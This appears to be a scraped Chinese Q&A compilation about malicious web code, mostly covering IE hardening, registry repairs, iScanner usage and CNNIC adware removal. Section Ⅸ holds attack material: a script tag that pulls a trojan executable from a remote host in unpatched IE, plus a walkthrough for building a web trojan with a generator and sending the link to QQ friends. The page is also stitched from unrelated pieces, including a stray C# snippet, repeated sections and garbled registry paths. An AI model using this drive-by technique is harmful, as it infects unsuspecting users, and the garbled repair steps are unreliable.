網頁惡意代碼通常利用
呵呵,現在網站掛馬可以直接通過HTTP80埠,因此即使你的伺服器安全性再高,專也不可能關屬閉80埠吧?只有通過設置用戶許可權來避免,如果是Win2003,可以設置網站頁面的用戶Users組「拒絕寫入」,可以有效防止掛馬。另外要注意你的伺服器中某些網站是否有帶有評論或者留言版?這些板塊都可以為黑客留下測試空間,你打開其中留言版查看是否有亂碼就知道了。另外網站掛馬一旦發生,往往頁面數量眾多,如果沒有清除干凈,就會導致反復掛馬,因此必須在全站范圍內搜索所有頁面來徹底清除惡意代碼。還有通過分析日誌可以發現一些相對固定的攻擊地址予以屏蔽也能改善你的網站情況。
Ⅱ 網頁惡意代碼通常利用什麼來實現植入並進行攻擊
if (myreader.HasRows)
答{
MessageBox.Show(myreader.GetString("email") );
}
}
myreader.Close();
mycon.Close();
Ⅲ 對於惡意代碼的預防主要用什麼和什麼相結合的辦法來實施
網頁惡意代碼防範技巧
相信不少用戶都遇到過這種情況:當打開一個網頁過後,就發現注冊表和IE設置被修改了,這就是網頁惡意代碼造成的破壞,但是這種網頁惡意代碼有著更大的危害,很有可能在你不知的情況下下載木馬,蠕蟲等病毒,同時把您的個人敏感信息,如銀行帳號,QQ帳號,游戲帳號泄露出去。對上網用戶造成了極大的危害。
1、要避免被網頁惡意代碼感染,首先關鍵是不要輕易去一些並不信任的站點,尤其是一些帶有美女圖片等的網址。但是這個並不能真正防止網頁惡意代碼的攻擊,因為這些惡意代碼有可能在任何地方出現。所以也可以參考進行以下步驟的設置。
2、運行IE時,點擊「工具→Internet選項→安全→ Internet區域的安全級別」,把安全級別由「中」改為「高」。網頁惡意代碼主要是含有惡意代碼的ActiveX或Applet、 JavaScript的網頁文件 ,所以在IE設置中將ActiveX插件和控制項、Java腳本等全部禁止就可以減少被網頁惡意代碼感染的幾率。具體方案是:在IE窗口中點擊「工具」→「Internet選項」,在彈出的對話框中選擇「安全」標簽,再點擊「自定義級別」按鈕,就會彈出「安全設置」對話框,把其中所有ActiveX插件和控制項以及與Java相關全部選項選擇「禁用」。但是,這樣做在以後的網頁瀏覽過程中有可能會使一些正常應用ActiveX的網站無法瀏覽。而對於使用Windows98的計算機用戶,請打開 C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的「ActiveXComponent.class」刪掉;對於使用Windows Me的計算機用戶,請打開C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把其中的「ActiveXComponent.class」刪掉。這個也只是一種折中的方案,我們可以有其它方法(如下)來保證IE的安全。
3、一定要在計算機上安裝網路防火牆,並要時刻打開「實時監控功能」。
4、設置注冊表編輯器中的相關項值:
1)運行打開注冊表編輯器命令regedit.exe進入注冊表;
2)在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下,增加名為DisableRegistryTools的DWORD值項,將其值改為「1」,即可禁止使用注冊表編輯器命令regedit.exe。因為特殊原因需要修改注冊表,可應用如下解鎖方法:
用記事本編輯一個任意名的.reg文件,其中的內容如下:
REGEDIT4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
"DisableRegistryTools"=dword:00000000
雙擊運行recover.reg即可。
5、隨時升級IE瀏覽器的補丁。
Ⅳ 惡意代碼是什麼
1.禁止使用電腦
現象描述:盡管網路流氓們用這一招的不多,但是一旦你中招了,後果真是不堪設想!瀏覽了含有這種惡意代碼的網頁其後果是:"關閉系統"、"運行"、"注銷"、注冊表編輯器、DOS程序、運行任何程序被禁止,系統無法進入"實模式"、驅動器被隱藏。
解決辦法:一般來說上述八大現象你都遇上了的話,基本上系統就給"廢"了,建議重裝。
2.格式化硬碟
現象描述:這類惡意代碼的特徵就是利用IE執行ActiveX的功能,讓你無意中格式化自己的硬碟。只要你瀏覽了含有它的網頁,瀏覽器就會彈出一個警告說"當前的頁面含有不安全的ctiveX,可能會對你造成危害",問你是否執行。如果你選擇"是"的話,硬碟就會被快速格式化,因為格式化時窗口是最小化的,你可能根本就沒注意,等發現時已悔之晚矣。
解決辦法:除非你知道自己是在做什麼,否則不要隨便回答"是"。該提示信息還可以被修改,如改成"Windows正在刪除本機的臨時文件,是否繼續",所以千萬要注意!此外,將計算機上Format.com、Fdisk.exe、Del.exe、Deltree.exe等命令改名也是一個辦法。
3.下載運行木馬程序
現象描述:在網頁上瀏覽也會中木馬?當然,由於IE5.0本身的漏洞,使這樣的新式入侵手法成為可能,方法就是利用了微軟的可以嵌入exe文件的eml文件的漏洞,將木馬放在eml文件里,然後用一段惡意代碼指向它。上網者瀏覽到該惡意網頁,就會在不知不覺中下載了木馬並執行,其間居然沒有任何提示和警告!
解決辦法:第一個辦法是升級您的IE5.0,IE5.0以上版本沒這毛病;此外,安裝金山毒霸、Norton等病毒防火牆,它會把網頁木馬當作病毒迅速查截殺。
4.注冊表的鎖定
現象描述:有時瀏覽了惡意網頁後系統被修改,想要用Regedit更改時,卻發現系統提示你沒有許可權運行該程序,然後讓你聯系管理員。暈了!動了我的東西還不讓改,這是哪門子的道理!
解決辦法:能夠修改注冊表的又不止Regedit一個,找一個注冊表編輯器,例如:Reghance。將注冊表中的HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值"DisableRegistryTools"鍵值恢復為"0",即可恢復注冊表。
5.默認主頁修改
現象描述:一些網站為了提高自己的訪問量和做廣告宣傳,利用IE的漏洞,將訪問者的IE不由分說地進行修改。一般改掉你的起始頁和默認主頁,為了不讓你改回去,甚至將IE選項中的默認主頁按鈕變為失效的灰色。不愧是網路流氓的一慣做風。
解決辦法:1.起始頁的修改。展開注冊表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main,在右半部分窗口中將"Start Page"的鍵值改為"about:blank"即可。同理,展開注冊表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,在右半部分窗口中將"Start Page"的鍵值改為"about:blank"即可。
注意:有時進行了以上步驟後仍然沒有生效,估計是有程序載入到了啟動項的緣故,就算修改了,下次啟動時也會自動運行程序,將上述設置改回來,解決方法如下:
運行注冊表編輯器Regedit.exe,然後依次展開HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主鍵,然後將下面的"registry.exe"子鍵(名字不固定)刪除,最後刪除硬碟里的同名可執行程序。退出注冊編輯器,重新啟動計算機,問題就解決了。
2.默認主頁的修改。運行注冊表編輯器,展開HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\,將Default-Page-URL子鍵的鍵值中的那些惡意網站的網址改正,或者設置為IE的默認值。
3.IE選項按鈕失效。運行注冊表編輯器,將HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel中的DWORD值"Settings"=dword:1、"Links"=dword:1、"SecAddSites"=dword:1全部改為"0",將HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值"homepage"的鍵值改為"0"。
6.篡改IE標題欄
現象描述:在系統默認狀態下,由應用程序本身來提供標題欄的信息。但是,有些網路流氓為了達到廣告宣傳的目的,將串值"Windows Title"下的鍵值改為其網站名或更多的廣告信息,從而達到改變IE標題欄的目的。非要別人看他的東西,而且是通過非法的修改手段,除了"無恥"兩個字,再沒有其它形容詞了。
解決辦法:展開注冊表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\下,在右半部分窗口找到串值"Windows Title",將該串值刪除。重新啟動計算機。
7.篡改默認搜索引擎
現象描述:在IE瀏覽器的工具欄中有一個搜索引擎的工具按鈕,可以實現網路搜索,被篡改後只要點擊那個搜索工具按鈕就會鏈接到網路注氓想要你去的網站。
解決辦法:運行注冊表編輯器,依次展開HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch和HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant,將CustomizeSearch及SearchAssistant的鍵值改為某個搜索引擎的網址即可。
8.IE右鍵修改
現象描述:有的網路流氓為了宣傳的目的,將你的右鍵彈出的功能菜單進行了修改,並且加入了一些亂七八糟的東西,甚至為了禁止你下載,將IE窗口中單擊右鍵的功能都屏蔽掉。
解決辦法:1.右鍵菜單被修改。打開注冊表編輯器,找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt,刪除相關的廣告條文。
2.右鍵功能失效。打開注冊表編輯器,展開到HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions,將其DWORD值"NoBrowserContextMenu"的值改為0。
9.篡改地址欄文字
現象描述:中招者的IE地址欄下方出現一些莫名其妙的文字和圖標,地址欄里的下拉框里也有大量的地址,並不是你以前訪問過的。
解決辦法:1.地址欄下的文字。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ToolBar下找到鍵值LinksFolderName,將其中的內容刪去即可。
2.地址欄中無用的地址。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypeURLs中刪除無用的鍵值即可。
10.啟動時彈出對話框
現象描述:1.系統啟動時彈出對話框,通常是一些廣告信息,例如歡迎訪問某某網站等等。2.開機彈出網頁,通常會彈出很多窗口,讓你措手不及,惡毒一點的,可以重復彈出窗口直到死機。
解決辦法:1.彈出對話框。打開注冊表編輯器,找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon主鍵,然後在右邊窗口中找到"LegalNoticeCaption"和"LegalNoticeText"這兩個字元串,刪除這兩個字元串就可以解決在啟動時出現提示框的現象了。
2.彈出網頁。點擊"開始-運行-輸入msconfig",選擇"啟動",把裡面後綴為url、html、htm的網址文件都勾掉。
11.IE窗口定時彈出
現象描述:中招者的機器每隔一段時間就彈出IE窗口,地址指向網路注氓的個人主頁。不曉得是不是網路流氓以為這樣你就會經常光顧?
解決辦法:點擊"開始-運行-輸入msconfig",選擇"啟動",把裡面後綴為hta的都勾掉,重啟。
Ⅳ 如何查找網頁惡意代碼
Linux伺服器上怎麼用iScanner刪除網頁惡意代碼?這篇文章主要介紹了Linux伺服器上用iScanner刪除網頁惡意代碼的方法,iScanner為Ruby編寫,所以伺服器上要首先安裝Ruby解釋器,需要的朋友可以參考下 第一步:安裝 首先要確保伺服器上已經安裝了Ruby 代碼如下: #ruby -v //查看ruby的版本信息 如果伺服器上沒有安裝,可以通過yum或者apt-get安裝ruby(根據自己伺服器系統選擇對應的方法安裝) 代碼如下: #yum install ruby //centos用yum安裝 #apt-get install ruby //ubantu用apt-get安裝 iScanner不需要額外的庫,且不需要安裝,但是作者還是做了個安裝和卸載腳本,讓我們可以可以通過下面的命令安裝和卸載 iScanner 代碼如下: # -F 用這個參數掃描指定的文件。 # iscanner -F /home/user/file -o 這個參數允許你將掃描的日誌文件保存為特定的地方和特定的文件名,如果未指定這個參數,默認感染日誌文件的格式為"infected-[TIME]-[DATE] -c 用這個參數,可以刪除受感染文件中的惡意代碼,而不刪除受感染的文件。當你用這個參數的時候,最好查看日誌文件,以確保iscanner將會從哪些文件中刪除惡意代碼。 # iscanner -c infected.log -b 這個參數可以讓iscanner保在刪除惡意代碼之前備份受感染的文件,默認備份的文件名為"backup-[TIME]-[DATE]". # iscanner -b -c infected.log -r 這個參數可以讓我們從備份的文件中恢復被刪除的文件 # iscanner -r backup/ -a 這個參數可以讓iscanner自動清除所有受感染的文件。這個參數可能會很危險,當你沒有先掃描文件或你不知道會產生何種結果。 # iscanner -f /home/user -a -D 這個參數可以讓iscanner在調試模式下運行,這個參數在你遇到問題問題是後將會很有用。 # iscanner -f /home/user -D -q 如果你不想看到任何iscanner的輸出信息,就可以用這個命令讓iscanner在安靜模式下運行 # iscanner -f /home/user -q -s 這個參數可以讓我們將受感染的文件交給iscanner的開發者分析,以改進和升級惡意代碼特徵庫 # iscanner -s /home/user/malicious_file.html -U 這個參數可以用來升級iscanner和惡意代碼特徵庫 # iscanner -U -u 這個參數用來升級惡意代碼特徵庫而不升級iscanner # iscanner -u -v 這個參數用來查詢列印輸出iscanner的版本和惡意代碼特徵庫的版本號。 # iscanner -v -h 這個參數可以查詢help幫助信息。 # iscanner -h 資料庫特徵 代碼如下: - - 0.0 - (REGULAR EXPRESSION) - Signature comment. - * 第一行是特徵的id '0.0'. *選項參數: MU --> 多行正則表達式。 LN --> 一行正則表達式。 RE -->用正則表達式掃描遠程的或者本地的文件。 LO -->用正則表達式只掃描本地文件。 工具開發者的一些提示信息和建議: *你可以輕松的修改惡意代碼特徵庫的正則表達式 *如果你的幾個網扎都被入侵了,你可以添加特徵到特徵庫讓iscanner掃描所有被感染的文件 *你可以將iscanner放到crontab中定時掃描你的 文件,並將掃描結果發到你指定的郵件,多方便哈! *你可以配置你的ftp伺服器使得iscanner掃描所有上傳的文件,並且如果有受感染的文件,則發送掃描記錄到指定文件報警,通知管理員。
Ⅵ 網站惡意代碼什麼意思
1、要避免被網頁惡意代碼感染,首先關鍵是不要輕易去一些並不信任的站點,尤其是一些帶有美女圖片等的網址。但是這個並不能真正防止網頁惡意代碼的攻擊,因為這些惡意代碼有可能在任何地方出現。所以也可以參考進行以下步驟的設置。
2、運行IE時,點擊「工具→Internet選項→安全→ Internet區域的安全級別」,把安全級別由「中」改為「高」。網頁惡意代碼主要是含有惡意代碼的ActiveX或Applet、 JavaScript的網頁文件 ,所以在IE設置中將ActiveX插件和控制項、Java腳本等全部禁止就可以減少被網頁惡意代碼感染的幾率。具體方案是:在IE窗口中點擊「工具」→「Internet選項」,在彈出的對話框中選擇「安全」標簽,再點擊「自定義級別」按鈕,就會彈出「安全設置」對話框,把其中所有ActiveX插件和控制項以及與Java相關全部選項選擇「禁用」。但是,這樣做在以後的網頁瀏覽過程中有可能會使一些正常應用ActiveX的網站無法瀏覽。而對於使用Windows98的計算機用戶,請打開 C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的「ActiveXComponent.class」刪掉;對於使用Windows Me的計算機用戶,請打開C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把其中的「ActiveXComponent.class」刪掉。這個也只是一種折中的方案,我們可以有其它方法(如下)來保證IE的安全。
3、一定要在計算機上安裝網路防火牆,並要時刻打開「實時監控功能」。
4、設置注冊表編輯器中的相關項值:
1)運行打開注冊表編輯器命令regedit.exe進入注冊表;
2)在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下,增加名為DisableRegistryTools的DWORD值項,將其值改為「1」,即可禁止使用注冊表編輯器命令regedit.exe。
因為特殊原因需要修改注冊表,可應用如下解鎖方法:
用記事本編輯一個任意名的.reg文件,其中的內容如下:
REGEDIT4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
"DisableRegistryTools"=dword:00000000
雙擊運行recover.reg即可。
5、隨時升級IE瀏覽器的補丁。
Ⅶ 如何禁止網頁惡意代碼的入侵求答案
網頁惡意代碼入侵如何禁止呢?首先我們要知道惡意代碼的工專作原理,我們知道網頁上所屬看到的都是表像,其內在實質就是一行一行的代碼,瀏覽器就是靠著看這些代碼來為我們呈現絢爛多彩的網頁的。那麼只要在這些正常的代碼中間加入幾段特意編的惡意代碼,那麼網頁就成了具有破壞力的惡意網頁了。因此要避免網頁惡意代碼的攻擊只要禁止這些惡意代碼的運行就可以了。
打開IE瀏覽器,依次點擊工具菜單下的Internet選項,選擇安全標簽,點擊自定義級別按鈕,在彈出的新對話框中把安全級別定義為高,ActiveX控制項和插件中的第二項對標記為可安全執行腳本的ActiveX控制項執行腳本和第三項對未標記為可安全執行腳本的ActiveX控制項初始化並執行腳本設置為禁用,這兩項禁止之後,所有網頁上的基於ActiveX的惡意代碼都被禁止執行,遇到有惡意代碼的網頁也就不怕了。
這是一個很實用的方法吧,按照這個方法設置一下,你再看一些網頁時,就不會有那些惡意軟體一個個彈出來了,也就不用煩心了,只管保持好心情上網遨遊。
Ⅷ 網頁惡意代碼有幾種解決方法!!
CNNIC中文上網為什麼流氓軟體總是殺不掉
釋放文件及文件夾
C:\Program Files\CNNIC
%system%\drivers\cdnprot.sys
%system%\drivers\cdntran.sys
%system%\drivers\gciecfgg.sys
gciecfgg.sys這個是隨機的,刪除後,還會再生產一個sys文件
%system%\cdnns.dll
%system%\cdn.dll
%system%\CDNprot.dat
添加或修改注冊表信息
[HKEY_LOCAL_MACHINE\SOFTWARE]
CNNIC
[HKEY_CURRENT_USER\Software]
CNNIC
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt]
訪問通用網址
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions]
CDNCLIENT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}
[HKEY_CLASSES_ROOT]
CdnForIE.IEHlprObj
[HKEY_CLASSES_ROOT\CLSID]
{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions]
{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[CdnCtr C:\Program Files\CNNIC\Cdn\cdnup.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
CdnClient
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services]
cdnprot
cdntran
gciecfgg
注意:
1、在未處理掉cdnprot.sys之前,大部分的注冊表操作或刪除文件操作,都不會有很好的效果
2、CNNIC的幾個dll文件則插入到N個進程當中
3、運行IceSword,則會立即重啟,應該是對IceSword做了防範
解決過程:
由於昨天太晚,一時心煩,沒有用手工來處理
1、使用CNNIC自帶的卸載程序先卸載
2、再用360安全衛士、惡意軟體清理助手等輪番掃盪
3、還有一些殘屍,手工刪除掉
PS:
經過上述依然搞之不定的,重點注意
%system%\drivers\cdnprot.sys
%system%\drivers\cdntran.sys
以及它們在注冊表裡的位置
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services]
Ⅸ 惡意代碼的基本原理
首先明確,惡意代碼實際上是一個HTML網頁,與其它網頁不同的是該網頁是黑客精心製作的,用戶一旦訪問了有惡意代碼的網頁就會中木馬。為什麼說是黑客精心製作的呢?因為嵌入在這個網頁中的腳本恰如其分地利用了IE瀏覽器的漏洞,讓IE在後台自動下載黑客放置在網路上的木馬並運行(安裝)這個木馬,也就是說,這個網頁能下載木馬到本地並運行(安裝)下載到本地電腦上的木馬,整個過程都在後台運行,用戶一旦打開這個網頁,下載過程和運行(安裝)過程就自動開始。
有朋友會說,打開一個網頁,IE瀏覽器真的能自動下載程序和運行程序嗎?如果IE真的能肆無忌憚地任意下載和運行程序,那天下還不大亂。實際上,為了安全,IE瀏覽器是禁止自動下載程序特別是運行程序的,但是,IE瀏覽器存在著一些已知和未知的漏洞,網頁木馬就是利用這些漏洞獲得許可權來下載程序和運行程序的。下面我舉IE瀏覽器早期的一個漏洞來分別說明這兩個問題。
⒈自動下載程序
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://go163go.vicp.net/1.exe"></SCRIPT>
小提示:代碼說明
a. 代碼中「src」的屬性為程序的網路地址,本例中「http://go163go.vicp.net/1.exe」為我放置在自己Web伺服器上的灰鴿子服務端安裝程序,這段代碼能讓網頁下載該程序到瀏覽它的電腦上。
b. 也可以把木馬程序上傳到免費的主頁空間上去,但免費空間出於安全的考慮,多數不允許上傳exe文件,黑客可能變通一下把擴展名exe改為bat或com,這樣他們就可以把這些程序上傳到伺服器上了。
把這段代碼插入到網頁源代碼的</BODY>…</BODY>之間(如圖1),然後用沒打補丁的IE6打開,接下來,打開IE的臨時目錄<Temporary Internet Files>,你會發現,在該文件夾中有一個「1.exe」文件,這也就是說,該網頁已自動下載了我放置在Web伺服器上的灰鴿子木馬。
二、網頁木馬的基本用法
理解了網頁木馬攻擊的原理,我們可以製作自己的網頁木馬,但這需要你根據IE漏洞寫出利用代碼。實際上,在網上有很多高手已寫出了一些漏洞的利用代碼,有的還把它寫成了可視化的程序。在搜索引擎輸入「網頁木馬生成器」進行搜索,你會發現,在網上有很多利用IE的各種漏洞編寫的網頁木馬生成器,它們大都為可視化的程序,只要你有一個木馬(該木馬必須把它放置到網路上),利用這些生成器你就可以立即生成一個網頁,該網頁就是網頁木馬,只要他人打開這個網頁,該網頁就可以自動完成下載木馬並運行(安裝)木馬的過程。
在我的電腦上我已下載了一個網頁木馬生成器,下面我們來看怎麼生成網頁木馬並讓他人中木馬。
第一步:啟動該網頁木馬生成器,如圖4所示,在文本框中輸入木馬的網路地址,最後單擊「生成」。
圖4 網頁木馬生成器
第二步:在網頁木馬生成器的安裝文件夾會生成一個網頁文件,該文件就是我們在上一步生成的網頁木馬。上傳該文件到自己的Web伺服器或免費主面空間。
現在好了,把上述網頁在伺服器上的地址(網址)通過QQ發給自己的好友,一旦他訪問了該網頁,該網頁就會在他的電腦上自動下載並運行你放置在網路上的木馬。
現在你該明白安全專家勸告的「不要打開陌生人發來的網路地址」這句話的真諦了吧!實際上,即使人人都不打開陌生人發來的網址,也仍然有一些人「飛蛾補燈,自尋死路」,因為若大的Internet,總會有一些人會有意或無意地訪問這些網址,而且,有些網頁木馬,還掛在一些知名網站上(根據知名網站的訪問量,你算算吧,每天有多少人中了木馬!)。
小提示:你可能還沒想到,看電影,在論壇查看或回復帖子也能中木馬。實際上,網頁木馬還可以掛在多媒體文件、電子郵件、論壇、CHM電子書上,這樣,用戶一旦觀看電影、查看或預覽郵件(主要是一些用電子郵件群發器發送的垃圾郵件)、參與帖子,打開電子書,用戶就會中網頁木馬。
Ⅹ 網頁惡意代碼危害有哪些這些危害怎麼解決
(一)如何在注冊表被鎖定的情況下修復注冊表
這是由於注冊表編輯器:
HKEY_CURRENT_下的DWORD值「DisableRegistryTools」被修改為「1」的緣故,將其鍵值恢復為「0」即可恢復注冊表的使用。
解決辦法:
(1)可以自己動手製作一個解除注冊表鎖定的工具,就是用記事本編輯一個任意名字的.reg文件,比如recover.reg,內容如下:
REGEDIT4
[HKEY_CURRENT_]
"DisableRegistryTools"=dword:00000000
(二)篡改IE的默認頁
有些IE被改了起始頁後,即使設置了「使用默認頁」仍然無效,這是因為IE起始頁的默認頁也被篡改了。具體說就是以下注冊表項被修改:
HKEY_LOCAL_ ExplorerMainDefault_Page_URL
「Default_Page_URL」這個子鍵的鍵值即起始頁的默認頁。
解決辦法:
運行注冊表編輯器,然後展開上述子鍵,將「Default_Page_UR」子鍵的鍵值中的那些篡改網站的網址改掉就行了,或者將其設置為IE的默認值。
(三)修改IE瀏覽器預設主頁,並且鎖定設置項,禁止用戶更改
主要是修改了注冊表中IE設置的下面這些鍵值(DWORD值為1時為不可選):
解決辦法:
將上面這些DWORD值改為「0」即可恢復功能。
(四)IE的默認首頁灰色按扭不可選
這是由於注冊表HKEY_USERS. ExplorerControl Panel
下的DWORD值「homepage」的鍵值被修改的緣故。原來的鍵值為「0」,被修改後為「1」(即為灰色不可選狀態)。
解決辦法:
將「homepage」的鍵值改為「0」即可。
(五)IE標題欄被修改
在系統默認狀態下,是由應用程序本身來提供標題欄的信息,但也允許用戶自行在上述注冊表項目中填加信息,而一些惡意的網站正是利用了這一點來得逞的:它們將串值Window Title下的鍵值改為其網站名或更多的廣告信息,從而達到改變瀏覽者IE標題欄的目的。
解決辦法:
①在Windows啟動後,點擊「開始」→「運行」菜單項,在「打開」欄中鍵入regedit,然後按「確定」鍵;
②展開注冊表到
HKEY_LOCAL_
ExplorerMain下,在右半部分窗口中找到串值「Window Title」 ,將該串值刪除即可,或將Window
Title的鍵值改為「IE瀏覽器」等你喜歡的名字;
③同理,展開注冊表到
HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain
然後按②中所述方法處理。
④退出注冊表編輯器,重新啟動計算機,運行IE,你會發現困擾你的問題被解決了!
(六)IE右鍵菜單被修改
解決辦法:
打開注冊標編輯器,找到
HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMenuExt
刪除相關的廣告條文即可,注意不要把下載軟體FlashGet和Netants也刪除掉,這兩個可是「正常」的,除非你不想在IE的右鍵菜單中見到它們。
(七)IE默認搜索引擎被修改
在IE瀏覽器的工具欄中有一個搜索引擎的工具按鈕,可以實現網路搜索,被篡改後只要點擊那個搜索工具按鈕就會鏈接到那個篡改網站。出現這種現象的原因是以下注冊表被修改:
HKEY_LOCAL_ ExplorerSearchCustomizeSearch
HKEY_LOCAL_ ExplorerSearchSearchAssistant
解決辦法:
運行注冊表編輯器,依次展開上述子鍵,將「CustomizeSearch」和「SearchAssistant」的鍵值改為某個搜索引擎的網址即可。
(八)系統啟動時彈出對話框
受到更改的注冊表項目為:
HKEY_LOCAL_
解決辦法:
打開注冊表編輯器,找到
HKEY_LOCAL_
這一個主鍵,然後在右邊窗口中找到「LegalNoticeCaption」和「LegalNoticeText」這兩個字元串,刪除這兩個字元串就可以解決在登陸時出現提示框的現象了。
(九)IE默認連接首頁被修改
IE瀏覽器上方的標題欄被改成「歡迎訪問……網站」的樣式,這是最常見的篡改手段,受害者眾多。
受到更改的注冊表項目為:
HKEY_LOCAL_ ExplorerMainStart Page
HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page
解決辦法:
①在Windows啟動後,點擊「開始」→「運行」菜單項,在「打開」欄中鍵入regedit,然後按「確定」鍵;
②展開注冊表到
HKEY_LOCAL_ ExplorerMain下,在右半部分窗口中找到串值「Start Page」雙擊 ,將Start Page的鍵值改為「about:blank」即可;
③同理,展開注冊表到
HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain
在右半部分窗口中找到串值「Start Page」,然後按②中所述方法處理。
④退出注冊表編輯器,重新啟動計算機,一切OK了!
特殊例子:當IE的起始頁變成了某些網址後,就算你通過選項設置修改好了,重啟以後又會變成他們的網址啦,十分的難纏。其實他們是在你機器里加了一個自運行程序,它會在系統啟動時將你的IE起始頁設成他們的網站。
解決辦法:運行注冊表編輯器regedit.exe,然後依次展開
HKEY_LOCAL_ VersionRun
主鍵,然後將其下的registry.exe子鍵刪除,然後刪除自運行程序c:Program Files egistry.exe,最後從IE選項中重新設置起始頁。
(十)IE中滑鼠右鍵失效
瀏覽網頁後在IE中滑鼠右鍵失效,點擊右鍵沒有任何反應!
有的網路流氓為了達到其惡意宣傳的目的,將你的右鍵彈出的功能菜單進行了修改,並且加入了一些亂七八糟的東西,甚至為了禁止你下載,將IE窗口中單擊右鍵的功能都屏蔽掉。
解決辦法:
1.右鍵菜單被修改。打開注冊表編輯器,找到HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMenuExt,刪除相關的廣告條文。
2.右鍵功能失效。打開注冊表編輯器,展開到HKEY_CURRENT_ ExplorerRestrictions,將其DWORD值"NoBrowserContextMenu"的值改為0。